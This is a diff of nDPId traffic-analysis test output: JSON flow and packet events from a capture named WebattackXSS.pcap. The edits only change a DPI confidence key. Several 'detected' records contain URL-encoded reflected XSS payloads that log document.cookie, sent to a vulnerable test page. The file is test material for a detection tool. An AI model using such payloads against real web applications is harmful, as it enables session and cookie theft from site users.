+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="} @@ -2592,7 +2592,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":2,"flow_last_seen":1499347743331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7DCbKjZEnqpWT6AScSAbmgAAAgQFtAQCCAoD5a7aATvdZQEDAwc="} @@ -2601,7 +2601,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="} @@ -2796,7 +2796,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -2827,7 +2827,7 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="} @@ -3050,7 +3050,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 